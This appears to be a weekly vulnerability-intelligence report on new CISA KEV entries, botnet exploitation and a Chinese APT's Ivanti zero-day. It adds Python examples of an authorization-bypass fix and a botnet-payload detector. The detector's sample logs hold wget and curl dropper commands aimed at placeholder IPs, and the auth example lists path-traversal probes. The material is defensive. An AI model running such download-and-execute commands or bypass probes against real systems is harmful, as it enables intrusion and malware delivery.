Executive Summary
The first week of March kicked off with a wave of security concerns as nine new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog. VMware ESXi, Workstation, and Fusion accounted for three of them, while Hitachi Vantara Pentaho contributed two. Meanwhile, vulnerabilities in Linux, Microsoft Windows, Cisco Small Business Routers, and Progress WhatsUp Gold further expanded the list. This surge serves as a stark reminder that attackers are actively targeting both enterprise and IT infrastructure, making timely patching and security vigilance more crucial than ever.
Botnet threats surged this week as EnemyBot and Sysrv-K exploited Spring Cloud Gateway, Andoryu leveraged a GitLab vulnerability, and Androxgh0st targeted PHP flaws. Meanwhile, Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on Eir D1000 modems.
Adding to the cybersecurity landscape, researchers observed a strategic shift in Silk Typhoon’s operations, with the group recently leveraging a zero-day vulnerability in Ivanti Pulse Connect VPN for initial access. This development reflects the evolving tactics of advanced threat actors, reinforcing the need for constant vigilance and adaptive security strategies.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
A critical Time-of-Check Time-of-Use (TOCTOU) Vulnerability has been discovered in VMware ESXi and Workstation, carrying a CVSS Score of 9.3. This flaw, exploited as a zero-day, affects ESXi versions 8.0, 7.0, and 6.7, as well as Workstation 17.x. An attacker with local authentication and administrative privileges can exploit this vulnerability to execute arbitrary code within the virtual-machine executable (VMX) process, potentially compromising system integrity. Broadcom has released patches to mitigate the risk, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
An Arbitrary Write Vulnerability has been identified in VMware ESXi, carrying a high CVSS Score of 8.2. This flaw has been actively exploited as a zero-day, allowing attackers to manipulate memory and potentially execute arbitrary code. In response, Broadcom has released patched versions of VMware ESXi, and the vulnerability has been added to the CISA KEV catalog, highlighting its critical nature.
An Information Disclosure Vulnerability affecting VMware ESXi versions 8.0, 7.0, and 6.7, Workstation 17.x and Fusion 13.x has been actively exploited as a zero-day, allowing unauthorized access to sensitive data. Broadcom has released patched versions of VMware ESXi, VMware Workstation 17.6.3 and VMware Fusion 13.6.3 to address the issue. The vulnerability has been included in the CISA KEV catalog, emphasizing the need for immediate remediation.
A critical Path Traversal Vulnerability with a CVSS Score of 9.8 has been discovered in Progress WhatsUp Gold, impacting versions prior to 2023.1.3. This flaw allows unauthenticated attackers to execute remote code, posing a severe security risk. The Shadowserver Foundation has detected active exploitation attempts of this vulnerability since August 2024. Additionally, GreyNoise has identified at least eight unique IP addresses from regions including Hong Kong, Russia, Brazil, South Korea and the U.K. as sources of malicious activity targeting this vulnerability. This vulnerability has also been added to the CISA KEV catalog recently.
A Use of Uninitialized Resource Vulnerability with a high CVSS score of 7.8 has been identified in the Linux Kernel. Google has addressed this issue in the Android Security Bulletin for March 2025 and has warned of indications of limited, targeted exploitation, though specific attack details were not disclosed. A report from Amnesty International suggests that this vulnerability was likely exploited as a zero-day by Cellebrite's mobile forensic tools to bypass the lock screen of an Android device belonging to a Serbian student activist. This flaw was reportedly part of a broader Android zero-day exploit chain developed by Cellebrite to unlock confiscated devices. The vulnerability has also been added to the CISA KEV catalog, prompting organizations to prioritize patching efforts to minimize exposure.
A Remote Code Execution Vulnerability with a high CVSS Score of 7.2 has been identified in Cisco Small Business router models RV016, RV042, RV042G, RV082, RV320, and RV325. This flaw enables attackers to deploy a webshell on the target router. Cisco has confirmed that the vulnerability remains unpatched, as the affected routers have reached end-of-life (EoL) status. Recent investigations from the Sekoia team revealed that the PolarEdge botnet, a sophisticated IoT-based malware campaign active since at least 2023, has infected over 2000 devices globally by exploiting this vulnerability. Given the risk of active exploitation, the vulnerability has been listed in the CISA KEV catalog.
A Special Element Injection Vulnerability with a high CVSS Score of 8.8 has been identified in Hitachi Vantara Pentaho Business Analytics Server, affecting versions prior to 9.4.0.1, prior to 9.3.0.2, and 8.3.0.0. If exploited, an attacker could inject Spring templates into properties files, leading to arbitrary command execution. To mitigate the risk, Hitachi Vantara recommends upgrading to Pentaho 9.4 with Service Pack 9.4.0.1 or applying Service Pack 9.3.0.2 or later for version 9.3. Acknowledging its threat potential, CISA has incorporated this vulnerability into its KEV catalog.
A critical Authorization Bypass Vulnerability with a CVSS Score of 9.8 has been identified in Hitachi Vantara Pentaho Business Analytics Server, affecting versions prior to 9.4.0.1, prior to 9.3.0.2, and 8.3.0.0. The vulnerability arises from the use of non-canonical URL paths for authorization decisions, allowing an attacker to bypass authorization controls and gain unauthorized access to sensitive functions or data. To address this issue, Hitachi Vantara released Pentaho Business Analytics Server 9.3.0.2 (LTS), 9.4.0.1, and later versions in August 2024. Due to its active exploitation, CISA has included this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog.
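The weakness class described above, deciding authorization on a request path that has not been canonicalized, is illustrated below with an added example. It is not Pentaho's code (the report does not describe the product's internals); it is a generic Python model with a hypothetical protected prefix "/admin", showing the weak check beside a corrected one that percent-decodes until stable, collapses repeated slashes and resolves "." and ".." segments before the authorization decision is made.

```python
import posixpath
import re
from urllib.parse import unquote

# Routes that require an administrator. Hypothetical value for this example.
PROTECTED_PREFIXES = ("/admin",)


def canonicalize(path: str) -> str:
    """Return the normalized form of a request path for authorization.

    Steps: drop query/fragment, percent-decode until stable (defeats
    double encoding), fold backslashes to slashes, collapse repeated
    slashes, resolve '.' and '..' segments and strip any trailing slash.
    """
    # Authorization should only ever look at the path component.
    path = path.split("?", 1)[0].split("#", 1)[0]
    # Decode repeatedly so "%2561dmin" -> "%61dmin" -> "admin".
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    path = path.replace("\\", "/")
    # posixpath.normpath preserves a leading "//", so collapse runs ourselves.
    path = re.sub(r"/+", "/", path)
    if not path.startswith("/"):
        path = "/" + path
    # normpath resolves "." and "..", and ".." cannot climb above the root.
    return posixpath.normpath(path)


def is_protected(canonical_path: str) -> bool:
    """True if the canonical path is, or lies beneath, a protected prefix."""
    return any(
        canonical_path == pre or canonical_path.startswith(pre + "/")
        for pre in PROTECTED_PREFIXES
    )


def naive_authorize(raw_path: str, is_admin: bool) -> bool:
    """Weak pattern: the decision is made on the raw request path, so
    "/public/../admin/users" is treated as a public resource even though
    the server will route it to /admin/users."""
    if raw_path.startswith("/admin"):
        return is_admin
    return True


def authorize(raw_path: str, is_admin: bool) -> bool:
    """Fixed pattern: canonicalize first, then decide on the same path
    representation the router will actually serve."""
    if is_protected(canonicalize(raw_path)):
        return is_admin
    return True


if __name__ == "__main__":
    for probe in ("/public/../admin/users", "/%2561dmin/users", "//admin//users/"):
        print(probe, "->", canonicalize(probe),
              "naive:", naive_authorize(probe, False),
              "fixed:", authorize(probe, False))
```

The important design point is that the canonical form used for the authorization decision must be the same one the request router uses; if the two disagree about how to treat an encoded or traversal-style path, the gap between them is exactly what an authorization bypass exploits.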
An Improper Resource Shutdown or Release Vulnerability has been identified in Microsoft Windows Win32K. If successfully exploited, an attacker could execute arbitrary code in kernel mode, enabling them to install programs, modify or delete data, and create new accounts with full user privileges. Microsoft released a security update in December 2018 to address this issue. However, in February 2023, AhnLab reported that the China-based APT group Dalbit (m00nlight) had actively exploited this vulnerability to escalate privileges on compromised systems, gaining higher access and control. This flaw has now been included in the CISA KEV catalog.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented below are the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with literal IP addresses.
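The heuristic named above, a downloader such as wget or curl fetching from a literal IP address inside a request payload, is shown below as an added detection example. It is not Loginsoft's sensor code, and the sample request lines are constructed for the example (documentation-range IPs, not indicators from the report). The logic percent-decodes each line until stable, then looks for wget or curl in the same shell command as a dotted-quad IPv4 URL and reports that IP, so a line that merely mentions wget, or merely contains an IP, is not flagged.

```python
import re
from urllib.parse import unquote

# Dotted-quad IPv4 literal. The lookarounds stop partial matches inside
# longer digit runs (e.g. "1192.0.2.10" or "192.0.2.100" matched as ...10).
IPV4 = (
    r"(?<!\d)(?:25[0-5]|2[0-4]\d|1?\d?\d)"
    r"(?:\.(?:25[0-5]|2[0-4]\d|1?\d?\d)){3}(?!\d)"
)

# A downloader invoked in the same shell command as a literal IPv4 URL.
# The character class stops at command separators so an unrelated IP in a
# later command of the pipeline is not attributed to the downloader.
DOWNLOADER_TO_IP = re.compile(
    r"\b(?:wget|curl)\b[^;|&\n]*?(?:https?://)?(" + IPV4 + ")",
    re.IGNORECASE,
)


def decode_payload(raw: str) -> str:
    """Percent-decode until stable so encoded payloads are inspected in the clear."""
    prev = None
    while raw != prev:
        prev, raw = raw, unquote(raw)
    return raw


def flag_botnet_payload(line: str):
    """Return the literal IP a downloader fetches from, or None if the
    line does not show the wget/curl-with-IP pattern."""
    match = DOWNLOADER_TO_IP.search(decode_payload(line))
    return match.group(1) if match else None


# Constructed sample sensor lines (192.0.2.0/24 and 198.51.100.0/24 are
# documentation ranges, not real infrastructure).
SAMPLE_LOGS = [
    "POST /cgi-bin/test HTTP/1.1 body=cd /tmp;wget http://192.0.2.10/bins.sh;chmod 777 bins.sh",
    "GET /index.php?cmd=curl%20-O%20http%3A%2F%2F198.51.100.7%2Fx86 HTTP/1.1",
    "GET /static/logo.png HTTP/1.1",
    "GET /download?url=http://updates.example.com/file HTTP/1.1",
    "GET /?q=wget+documentation HTTP/1.1",
    "GET /?host=192.0.2.99 HTTP/1.1",
]


def scan(lines):
    """Return (line index, download IP) for every line matching the heuristic."""
    return [
        (idx, ip)
        for idx, line in enumerate(lines)
        if (ip := flag_botnet_payload(line)) is not None
    ]


if __name__ == "__main__":
    for idx, ip in scan(SAMPLE_LOGS):
        print(f"line {idx}: downloader fetching from {ip}")
```

In a real pipeline the reported IPs would be grouped per CVE (keyed on the request path or parameter the payload targets) to produce the kind of top-5 ranking the section refers to; the decode-before-match step matters because URL-encoded payloads would otherwise slip past a pattern written against the raw line.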
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is sourced from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Microsoft Threat Intelligence has observed a tactical shift in the operations of Silk Typhoon, a Chinese espionage group, which now focuses on exploiting common IT solutions such as remote management tools and cloud applications to gain initial access. In January 2025, the group was also found leveraging CVE-2025-0282, a zero-day vulnerability in the public-facing Ivanti Pulse Connect VPN. Upon identifying this activity, the Microsoft Threat Intelligence Center promptly reported the issue to Ivanti, leading to a swift resolution of the critical exploit. This rapid response significantly minimized the window of opportunity for advanced threat actors to exploit the vulnerability.
PRE-NVD observed for this week
This refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/03/04/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/03/03/cisa-adds-five-known-exploited-vulnerabilities-catalog
- https://source.android.com/docs/security/bulletin/2025-03-01
- https://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/
- https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024
- https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390